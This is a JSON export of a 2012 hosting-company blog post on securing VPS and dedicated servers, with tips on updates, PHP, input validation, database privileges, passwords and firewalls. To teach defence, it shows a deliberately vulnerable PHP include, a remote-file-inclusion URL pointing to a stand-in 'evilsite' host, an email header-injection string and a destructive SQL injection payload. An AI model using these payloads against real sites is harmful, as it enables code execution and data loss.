{"id":5365,"date":"2012-07-16T09:57:40","date_gmt":"2012-07-16T09:57:40","guid":{"rendered":"https:\/\/www.heartinternet.uk\/blog\/?p=5365"},"modified":"2012-07-16T09:57:40","modified_gmt":"2012-07-16T09:57:40","slug":"vps-and-dedicated-server-security","status":"publish","type":"post","link":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/","title":{"rendered":"VPS and Dedicated Server Security"},"content":{"rendered":"

After my last post on our VPS platform<\/a>, we had a question from one of our customers, Neil, about VPS<\/a> and dedicated server<\/a> security. So in this next article, I am going to talk about security, offer tips and discuss best practice which will allow you to secure your VPS or dedicated server (the principles are identical) itself, the sites it hosts, and also some things you can to prevent other kinds of attack outside of the scope of your server\/sites.<\/p>\n

Being part of Europe\u2019s largest group of hosting and domain companies, we host a *lot* of websites, and we supply a very large number of dedicated and virtual servers. This puts us in a position that allows us to witness a wide range attacks on people\u2019s sites and servers.<\/p>\n

In the overwhelming number of cases, these attacks could have been prevented by following some very simple guidelines. I\u2019m going to start with the easy ones, and finish off with the more difficult ones.<\/p>\n

\"\"<\/p>\n

Turn On Auto Updates<\/h4>\n

On a linux machine, this is as simple as adding a daily cronjob which would run with \u201cyum update -y\u201d for a CentOS machine, \u201capt-get update -y\u201d for a Debian\/Ubuntu machine, or turning on auto-updates in Windows.<\/p>\n

As the owner of a server, you have the responsibility to check whether updates have been applied (check your cronjob emails or auto-update in Windows). If a new kernel has been applied, then you must reboot your server. Sometimes this is unavoidable, so schedule downtime with your clients.<\/p>\n

\"\"<\/p>\n

Secure PHP<\/h4>\n

PHP sites form the vast majority of cracks which take place on our platform.\"\"This is not because PHP is inherently insecure, it\u2019s because it allows developers to write code that can easily be exploited.<\/p>\n

The number one way of cracking a PHP site is using remote file includes by accident. Here is a very small PHP script:<\/p>\n

<\/p>\n

<?php<\/p>\n

my $page_to_run = $_GET[\u2018page\u2019];<\/p>\n

include($page_to_run . \u201c.php\u201d);<\/p>\n

?><\/p>\n

<\/code><\/p>\n

This might look like a very simple dispatcher page, so your sites URLs would look like below<\/p>\n

https:\/\/www.mysite.com\/index.php?page=welcome<\/p>\n

https:\/\/www.mysite.com\/index.php?page=contactus<\/code><\/p>\n

But, because of the flexibility of PHP, all a user has to do is host a text file somewhere on the internet (at the URL https:\/\/www.evilsite.com\/evilscript.php) containing PHP code, and he can have his own code executed in your site, by using this URL:<\/p>\n

https:\/\/www.mysite.com\/index.php?page=https:\/\/www.evilsite.com\/evilscript<\/code><\/p>\n

And boom, your site has been cracked. This is because PHP can tell the difference between files and URLs, and will happily open a network connection and go and get this file for you, and run it in your site.<\/p>\n

Ways around this include validating the input from the $_GET hash, to make sure they don\u2019t look like URLs, and another very one is to setup a php.in (or a php5.ini file) with these directives in it:<\/p>\n

allow_url_include = 0<\/p>\n

allow_url_fopen = 0<\/code><\/p>\n

We don\u2019t do this by default on our platform because we simply can\u2019t assume that people won\u2019t want to use these features (they\u2019re on by default in PHP), but they can be turned off easily using the above.<\/p>\n

\"\"<\/p>\n

Validate All Input<\/h4>\n

This might sound like an obvious one, but it\u2019s scary how often simple input validation can save you from something nasty. It can be used to protect you from simple things such as…<\/p>\n

cross-site-scripting<\/i> – entering your name as:<\/p>\n

<\/p>\n

<\/b>Joe Bloggs<\/code><\/p>\n

into a site without validation will never display the evil, but your evil javascript will be running every time your name is displayed in a webpage.<\/p>\n

spam from contact forms<\/i> – it\u2019s very easy to trick an insecure contact form into sending email on your behalf. If it contains a \u201cFrom:\u201d address field (i.e., the visitor), manipulation of this can make the MTA (the mailing software on the server running the website) obey other headers, e.g., CC or BCC. So, if you type the following into a \u201cvisitor email address\u201d box:<\/p>\n

sender@somedomain.com;rncc: vicitim-of-spam@somedomain.com<\/p>\n

Then the mailer will send whatever you type into the message box to vicitim-of-spam@somedomain.com as well.<\/p>\n

SQL injection<\/i> – Your website probably needs a database; you know you want your database secure, but too many people are quite happy to code a website which passes user input from the website straight to the database server without checking it. Let\u2019s say you have this piece of (pseudo) code:<\/p>\n

<\/p>\n

<?php<\/p>\n

$query = $_GET[\u2018q\u2019];<\/p>\n

$results = mysql_exec(\u201cSELECT * FROM table WHERE terms LIKE \u2018$query\u2019\u201d);<\/p>\n

display_results($results);<\/p>\n

?><\/p>\n

<\/code><\/p>\n

It is possible for me to enter the following as the value for query (taken from the HTML q form field):<\/p>\n

blahblah\u2018; DROP TABLE terms;<\/code><\/p>\n

This means that the database will execute the following:<\/p>\n

SELECT * FROM table WHERE terms LIKE \u2018blahblah\u2019; DROP TABLE terms;<\/code><\/p>\n

So, with this in mind, you can basically make the database execute anything you want. One better practice is, obviously, validate user input, but the proper way is to use placeholders. The code would look something like this:<\/p>\n

<\/p>\n

<?php<\/p>\n

$query = $_GET[\u2018q\u2019];<\/p>\n

$results = mysql_exec(\u201cSELECT * FROM table WHERE terms LIKE ?\u201d, $query);<\/p>\n

display_results($results);<\/p>\n

?><\/p>\n

<\/code><\/p>\n

So the server knows that the only value that can change is marked by \u201c?\u201d (the placeholder), and that it comes from the $query variable – it will escape it as necessary. That way, people cannot inject their own SQL into your server. This leads us onto…<\/p>\n

\"\"<\/p>\n

Keep DB Users As Unprivileged As Possible<\/h4>\n

The likelihood is that your site will do lots of SELECTing from the database, but comparatively little UPDATE, DELETE or INSERTing. \"\" It may not even need to use all of the tables. The database user which provides the access for the website should have the absolute minimum level of privileges.<\/p>\n

Different websites accessing the same database (but different sets of data) should each have their own database user.<\/p>\n

It is also very bad practice to use the database server master user. I know it can be tempting to \u201cjust use it\u201d because it\u2019s setup and it will work, but the consequences can be a disaster. Here are some examples of how to setup users in MySQL and give them specific table\/column access.<\/p>\n

GRANT USAGE ON *.* to \u2018websiteuser\u2019@\u201922.33.44.55\u2019 IDENTIFIED BY \u2018a_strong_password\u2019;<\/p>\n

GRANT SELECT, INSERT, UPDATE, DELETE ON \u2018tablea\u2019.* TO \u2018websiteuser\u2019@\u201922.33.44.55\u2019;<\/p>\n

GRANT SELECT (id, name) ON \u2018tableb\u2019.* TO \u2018websiteuser\u2019@\u201922.33.44.55\u2019;<\/p>\n

GRANT INSERT ON \u2018tablec\u2019.* TO \u2018websiteuser\u2019@\u201922.33.44.55\u2019;<\/code><\/p>\n

This sets up a user called \u201cwebsiteuser\u201d with password \u201ca_strong_password\u201d who can only connect from the server at IP address 22.33.44.55. He has all permissions on tablea, he can only SELECT columns id and name from tableb, and he can only insert into tablec.<\/p>\n

\"\"<\/p>\n

User Isolation<\/h4>\n

If you are hosting more than one site on your server, each site\u2019s code should execute as a different system user. The idea is that if one site is cracked, it cannot affect the other sites on the server: this also form the very basis of shared hosting; usera cannot harm the site of userb.<\/p>\n

Setup of this is very much beyond the scope of this article, however the technologies users are called SuExec and suPHP. However, don\u2019t panic, we provide two control panels which will take care of this for you, cPanel and Plesk. Both are available as control panel extras for CentOS. If you have a non CentOS (but still Linux) dedicated server or VPS, want to isolate your sites, but don\u2019t know how, we\u2019d recommend switching to CentOS and using cPanel or Plesk.<\/p>\n

Websites under IIS on Windows run as separate users already.<\/p>\n

\"\"<\/p>\n

Use Strong Passwords<\/h4>\n

Again, another common sense one, but use strong password for your admin areas, SSH, database users, Remote Desktop, everything.<\/p>\n

A very common way to quickly generate a strong password is to use openssl from the command line on just about any Linux (or UNIX) box:<\/p>\n

[ricky@fibrosis ~]$ openssl rand -base64 12<\/p>\n

6kxT6u6kIHjmpTVW<\/code><\/p>\n

So, there\u2019s me generating a decent length password in no time at all. Don’t reuse password, just generate a new one every time you need one!<\/p>\n

\"\"<\/p>\n

Firewall<\/h4>\n

\"\"<\/p>\n

All modern Windows and Linux desktops provide a software firewall. The following is a very simple example of setting up iptables on a Linux machine to allow HTTP traffic and SSH traffic, and to drop all other traffic. The file would go into \/etc\/sysconfig\/iptables on a CentOS\/Fedora box.<\/p>\n

*filter<\/p>\n

:INPUT ACCEPT [368:102354]\n

:FORWARD ACCEPT [0:0]\n

:OUTPUT ACCEPT [92952:20764374]\n

-A INPUT -i lo -j ACCEPT<\/p>\n

-A INPUT -m conntrack—ctstate RELATED,ESTABLISHED -j ACCEPT<\/p>\n

-A INPUT -i eth0 -p tcp -m tcp—dport 22 -j ACCEPT<\/p>\n

-A INPUT -i eth0 -p tcp -m tcp—dport 80 -j ACCEPT<\/p>\n

-A INPUT -j DROP<\/p>\n

COMMIT<\/code><\/p>\n

To allow inbound email (SMTP) add the following before the DROP line:<\/p>\n

-A INPUT -i eth0 -p tcp -m tcp—dport 25 -j ACCEPT<\/code><\/p>\n

To allow IMAP and POP, add these:<\/p>\n

-A INPUT -i eth0 -p tcp -m tcp—dport 143 -j ACCEPT<\/p>\n

-A INPUT -i eth0 -p tcp -m tcp—dport 110 -j ACCEPT<\/code><\/p>\n

You can see how these build up. Please see your vendor\u2019s documentation for more details on iptables (it\u2019s can get quite complex). Windows comes with a visual firewall whose services can be checked and unchecked as necessary.<\/p>\n

\"\"<\/p>\n

Use TLS (SSL) Where Possible<\/h4>\n

This one isn\u2019t something you do on your server, but a practice you do at home or in the office. If you can use https instead of http, do it, if you can use IMAPs instead of IMAP, do it… If you can use SSL for your email, do it. This limits any outside attacks (people listening to your traffic if you\u2019re at an internet cafe for example), and will also prevent viruses on your computer sniffing out your passwords.<\/p>\n

 <\/p>\n","protected":false},"excerpt":{"rendered":"

After my last post on our VPS platform, we had a question from one of our customers, Neil, about VPS and dedicated server security. So in this next article, I…<\/p>\n","protected":false},"author":2,"featured_media":8175,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,23],"tags":[],"class_list":{"0":"post-5365","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-dedicated-servers","8":"category-vps"},"yoast_head":"\nVPS and Dedicated Server Security - Heart Internet<\/title>\n<meta name=\"description\" content=\"VPS and Dedicated Server Security - Written by the team at Heart Internet.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/\" \/>\n<meta property=\"og:locale\" content=\"en_GB\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"VPS and Dedicated Server Security - Heart Internet\" \/>\n<meta property=\"og:description\" content=\"VPS and Dedicated Server Security - Written by the team at Heart Internet.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/\" \/>\n<meta property=\"og:site_name\" content=\"Heart Internet\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/heartinternet\/\" \/>\n<meta property=\"article:published_time\" content=\"2012-07-16T09:57:40+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2015\/06\/category_dedicated_servers1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1620\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Eliot Chambers-Ostler\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@heartinternet\" \/>\n<meta name=\"twitter:site\" content=\"@heartinternet\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Eliot Chambers-Ostler\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimated reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/\"},\"author\":{\"name\":\"Eliot Chambers-Ostler\",\"@id\":\"https:\/\/heartblog.victory.digital\/#\/schema\/person\/58ed7f27cc0f3ab6e69135742a5eee28\"},\"headline\":\"VPS and Dedicated Server Security\",\"datePublished\":\"2012-07-16T09:57:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/\"},\"wordCount\":1442,\"commentCount\":4,\"publisher\":{\"@id\":\"https:\/\/heartblog.victory.digital\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2015\/06\/category_dedicated_servers1.jpg\",\"articleSection\":[\"Dedicated Servers\",\"VPS\"],\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/\",\"url\":\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/\",\"name\":\"VPS and Dedicated Server Security - Heart Internet\",\"isPartOf\":{\"@id\":\"https:\/\/heartblog.victory.digital\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2015\/06\/category_dedicated_servers1.jpg\",\"datePublished\":\"2012-07-16T09:57:40+00:00\",\"description\":\"VPS and Dedicated Server Security - Written by the team at Heart Internet.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#breadcrumb\"},\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#primaryimage\",\"url\":\"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2015\/06\/category_dedicated_servers1.jpg\",\"contentUrl\":\"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2015\/06\/category_dedicated_servers1.jpg\",\"width\":1620,\"height\":720},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.heartinternet.uk\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"VPS and Dedicated Server Security\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/heartblog.victory.digital\/#website\",\"url\":\"https:\/\/heartblog.victory.digital\/\",\"name\":\"Heart Internet\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/heartblog.victory.digital\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/heartblog.victory.digital\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-GB\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/heartblog.victory.digital\/#organization\",\"name\":\"Heart Internet\",\"url\":\"https:\/\/heartblog.victory.digital\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/heartblog.victory.digital\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2025\/02\/HeartInternet_Logo_Colour.webp\",\"contentUrl\":\"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2025\/02\/HeartInternet_Logo_Colour.webp\",\"width\":992,\"height\":252,\"caption\":\"Heart Internet\"},\"image\":{\"@id\":\"https:\/\/heartblog.victory.digital\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/heartinternet\/\",\"https:\/\/x.com\/heartinternet\",\"https:\/\/www.linkedin.com\/company\/heart-internet-ltd\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/heartblog.victory.digital\/#\/schema\/person\/58ed7f27cc0f3ab6e69135742a5eee28\",\"name\":\"Eliot Chambers-Ostler\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/heartblog.victory.digital\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2025\/08\/cropped-Eliot-96x96.jpg\",\"contentUrl\":\"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2025\/08\/cropped-Eliot-96x96.jpg\",\"caption\":\"Eliot Chambers-Ostler\"},\"url\":\"https:\/\/www.heartinternet.uk\/blog\/author\/eliot-chambers-ostler\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"VPS and Dedicated Server Security - Heart Internet","description":"VPS and Dedicated Server Security - Written by the team at Heart Internet.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/","og_locale":"en_GB","og_type":"article","og_title":"VPS and Dedicated Server Security - Heart Internet","og_description":"VPS and Dedicated Server Security - Written by the team at Heart Internet.","og_url":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/","og_site_name":"Heart Internet","article_publisher":"https:\/\/www.facebook.com\/heartinternet\/","article_published_time":"2012-07-16T09:57:40+00:00","og_image":[{"width":1620,"height":720,"url":"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2015\/06\/category_dedicated_servers1.jpg","type":"image\/jpeg"}],"author":"Eliot Chambers-Ostler","twitter_card":"summary_large_image","twitter_creator":"@heartinternet","twitter_site":"@heartinternet","twitter_misc":{"Written by":"Eliot Chambers-Ostler","Estimated reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#article","isPartOf":{"@id":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/"},"author":{"name":"Eliot Chambers-Ostler","@id":"https:\/\/heartblog.victory.digital\/#\/schema\/person\/58ed7f27cc0f3ab6e69135742a5eee28"},"headline":"VPS and Dedicated Server Security","datePublished":"2012-07-16T09:57:40+00:00","mainEntityOfPage":{"@id":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/"},"wordCount":1442,"commentCount":4,"publisher":{"@id":"https:\/\/heartblog.victory.digital\/#organization"},"image":{"@id":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#primaryimage"},"thumbnailUrl":"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2015\/06\/category_dedicated_servers1.jpg","articleSection":["Dedicated Servers","VPS"],"inLanguage":"en-GB","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/","url":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/","name":"VPS and Dedicated Server Security - Heart Internet","isPartOf":{"@id":"https:\/\/heartblog.victory.digital\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#primaryimage"},"image":{"@id":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#primaryimage"},"thumbnailUrl":"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2015\/06\/category_dedicated_servers1.jpg","datePublished":"2012-07-16T09:57:40+00:00","description":"VPS and Dedicated Server Security - Written by the team at Heart Internet.","breadcrumb":{"@id":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#breadcrumb"},"inLanguage":"en-GB","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/"]}]},{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#primaryimage","url":"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2015\/06\/category_dedicated_servers1.jpg","contentUrl":"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2015\/06\/category_dedicated_servers1.jpg","width":1620,"height":720},{"@type":"BreadcrumbList","@id":"https:\/\/www.heartinternet.uk\/blog\/vps-and-dedicated-server-security\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.heartinternet.uk\/blog\/"},{"@type":"ListItem","position":2,"name":"VPS and Dedicated Server Security"}]},{"@type":"WebSite","@id":"https:\/\/heartblog.victory.digital\/#website","url":"https:\/\/heartblog.victory.digital\/","name":"Heart Internet","description":"","publisher":{"@id":"https:\/\/heartblog.victory.digital\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/heartblog.victory.digital\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-GB"},{"@type":"Organization","@id":"https:\/\/heartblog.victory.digital\/#organization","name":"Heart Internet","url":"https:\/\/heartblog.victory.digital\/","logo":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/heartblog.victory.digital\/#\/schema\/logo\/image\/","url":"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2025\/02\/HeartInternet_Logo_Colour.webp","contentUrl":"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2025\/02\/HeartInternet_Logo_Colour.webp","width":992,"height":252,"caption":"Heart Internet"},"image":{"@id":"https:\/\/heartblog.victory.digital\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/heartinternet\/","https:\/\/x.com\/heartinternet","https:\/\/www.linkedin.com\/company\/heart-internet-ltd"]},{"@type":"Person","@id":"https:\/\/heartblog.victory.digital\/#\/schema\/person\/58ed7f27cc0f3ab6e69135742a5eee28","name":"Eliot Chambers-Ostler","image":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/heartblog.victory.digital\/#\/schema\/person\/image\/","url":"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2025\/08\/cropped-Eliot-96x96.jpg","contentUrl":"https:\/\/www.heartinternet.uk\/blog\/wp-content\/uploads\/2025\/08\/cropped-Eliot-96x96.jpg","caption":"Eliot Chambers-Ostler"},"url":"https:\/\/www.heartinternet.uk\/blog\/author\/eliot-chambers-ostler\/"}]}},"_links":{"self":[{"href":"https:\/\/www.heartinternet.uk\/blog\/wp-json\/wp\/v2\/posts\/5365","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.heartinternet.uk\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.heartinternet.uk\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.heartinternet.uk\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.heartinternet.uk\/blog\/wp-json\/wp\/v2\/comments?post=5365"}],"version-history":[{"count":0,"href":"https:\/\/www.heartinternet.uk\/blog\/wp-json\/wp\/v2\/posts\/5365\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.heartinternet.uk\/blog\/wp-json\/wp\/v2\/media\/8175"}],"wp:attachment":[{"href":"https:\/\/www.heartinternet.uk\/blog\/wp-json\/wp\/v2\/media?parent=5365"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.heartinternet.uk\/blog\/wp-json\/wp\/v2\/categories?post=5365"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.heartinternet.uk\/blog\/wp-json\/wp\/v2\/tags?post=5365"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}